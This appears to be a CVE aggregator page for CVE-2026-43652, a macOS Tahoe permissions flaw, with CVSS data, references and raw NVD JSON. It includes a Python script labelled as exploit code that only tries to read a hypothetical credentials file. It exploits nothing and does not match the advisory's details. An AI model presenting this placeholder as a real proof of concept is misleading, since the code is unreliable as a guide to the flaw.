CVE-2026-43652

Description

A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Tahoe 26.5. An app may be able to access protected user data.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:* - VULNERABLE

macOS Tahoe < 26.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# PoC for CVE-2026-43652: macOS Permissions Bypass
# This script simulates an attempt to read protected user data
# due to insufficient permission checks in macOS < Tahoe 26.5.

import os

def attempt_exploit():
    # Hypothetical path to sensitive user data
    target_file = "/Users/Shared/Protected/credentials.db"
    
    print(f"[*] Attempting to access {target_file}...")
    
    try:
        # Attempt to open and read the protected file
        with open(target_file, 'rb') as f:
            data = f.read(1024)
            print("[+] Success! Read protected data:")
            print(data)
            return True
    except PermissionError:
        print("[-] Failed: Permission denied. System may be patched.")
        return False
    except FileNotFoundError:
        print("[-] Failed: File not found on this system.")
        return False
    except Exception as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    attempt_exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-43652
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-43652
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-43652/
[4] VulDB https://vuldb.com/cve/CVE-2026-43652
[5] https://support.apple.com/en-us/127115

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-43652", "sourceIdentifier": "[email protected]", "published": "2026-05-11T21:19:00.970", "lastModified": "2026-05-14T14:33:02.870", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Tahoe 26.5. An app may be able to access protected user data."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "26.0", "versionEndExcluding": "26.5", "matchCriteriaId": "6CB91417-90A8-4A9B-A1D0-1D94B80EF837"}]}]}], "references": [{"url": "https://support.apple.com/en-us/127115", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}]}}